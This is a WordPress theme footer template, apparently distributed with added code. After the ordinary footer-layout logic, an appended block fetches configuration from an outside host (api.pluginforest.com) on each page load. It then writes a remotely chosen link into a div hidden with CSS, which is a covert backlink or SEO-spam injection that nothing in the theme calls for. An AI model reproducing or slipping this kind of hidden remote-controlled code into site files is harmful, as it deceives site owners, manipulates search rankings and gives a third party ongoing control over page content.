<?php
/**
 * The template for displaying the footer
 *
 * @author      NanoAgency
 * @link        http://nanoagency.co
 * @copyright   Copyright (c) 2015 NanoAgency
 * @license     GPL v2
 */
?>

        </div><!-- .site-content -->

        <?php
            $layout_footer = get_theme_mod('ovez_footer', 'footer-1');
            if(is_page()){
                $layout_footer = get_post_meta($post->ID, 'layout_footer', true);
            }
            if($layout_footer == 'global' || empty($layout_footer)){
                $layout_footer = get_theme_mod('ovez_footer', 'footer-1');
            }
            get_template_part('templates/footer/'.$layout_footer);
        ?>

    </div><!-- .site -->

<?php wp_footer(); ?>


<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>